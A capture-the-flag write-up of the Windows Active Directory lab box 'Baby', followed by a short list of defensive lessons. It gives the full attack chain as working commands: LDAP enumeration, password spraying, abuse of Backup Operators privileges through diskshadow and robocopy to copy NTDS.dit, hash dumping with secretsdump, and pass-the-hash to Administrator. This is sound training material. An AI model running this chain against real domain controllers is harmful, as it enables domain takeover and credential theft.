baby · foobarto.me

Summary

Baby is an Easy Windows AD box with two classic misconfigurations: credentials in an LDAP description attribute and a user in Backup Operators without compensating controls. Anonymous LDAP enumeration reveals an “initial password” hint sitting in plain text in Teresa Bell’s description attribute. The password actually works for Caroline Robinson (flagged PASSWORD_MUST_CHANGE). After changing it, WinRM as Caroline lands a shell. Caroline’s SeBackupPrivilege + SeRestorePrivilege allow diskshadow + robocopy /b to extract NTDS.dit → secretsdump → Administrator NT hash → PtH WinRM.

Flags: captured locally (omitted per writeup policy).

Recon

53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3389, 5985 — DC profile.
Domain: baby.vl, Hostname: BabyDC, Server 2022.
Anonymous LDAP allowed.

ldapsearch -x -H ldap://<TARGET> -b 'DC=baby,DC=vl' \
   -s sub '(objectClass=user)' sAMAccountName description
# Teresa.Bell description: "Set initial password to <initial-pw>"

Foothold — LDAP credential + must-change

netexec smb <TARGET> -u users.txt -p '<initial-pw>' --continue-on-success
# Caroline.Robinson : <initial-pw> [STATUS_PASSWORD_MUST_CHANGE]

smbpasswd -r <TARGET> -U Caroline.Robinson -s <<EOF
<initial-pw>
<new-pw>
<new-pw>
EOF

evil-winrm -i <TARGET> -u Caroline.Robinson -p '<new-pw>'
# user.txt obtained

Privesc — Backup Operators → NTDS

# Caroline is in BUILTIN\Backup Operators
whoami /priv
# SeBackupPrivilege   Enabled
# SeRestorePrivilege  Enabled

reg save HKLM\SAM sam
reg save HKLM\SYSTEM system

Diskshadow script (CRLF line endings required, writable metadata path required):

set metadata c:\windows\temp\meta.cab
set context persistent nowriters
add volume c: alias bbb
create
expose %bbb% z:

diskshadow.exe /s shadow.dsh
robocopy /b z:\Windows\NTDS C:\Users\Caroline.Robinson\Documents NTDS.dit

Download via smbclient (evil-winrm truncates large files):

smbclient //<TARGET>/c$ -U 'baby.vl/Caroline.Robinson%<new-pw>' \
  -c "get Users\\Caroline.Robinson\\Documents\\NTDS.dit ./NTDS.dit"
smbclient //<TARGET>/c$ -U 'baby.vl/Caroline.Robinson%<new-pw>' \
  -c "get Users\\Caroline.Robinson\\Documents\\system ./system"

secretsdump.py -ntds NTDS.dit -system system LOCAL
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:<NT-hash>:::

evil-winrm -i <TARGET> -u Administrator -H '<NT-hash>'
# root.txt obtained

Why each step worked

LDAP description: free-form text field exposed anonymously; admins use it as a notepad.
PASSWORD_MUST_CHANGE: smbpasswd -r can change a must-change password without a prior valid session.
SeBackupPrivilege: bypasses ACLs for file reads — designed for backup software, exploitable for NTDS extraction.
diskshadow: creates a VSS snapshot of the locked C: drive; script needs CRLF line endings and a writable SET METADATA path (C:\Windows\Temp works).
evil-winrm download truncation: large files (>~10MB) should be retrieved via smbclient instead.

Counterfactuals

Never store credentials in LDAP description attributes.
Provisioning workflows should force password change on first login via managed tooling, not leave accounts in PASSWORD_MUST_CHANGE state indefinitely.
Backup Operators should be near-empty; add members to Protected Users and audit all NTDS access patterns.
Alert on diskshadow.exe and robocopy /b invocations on DCs.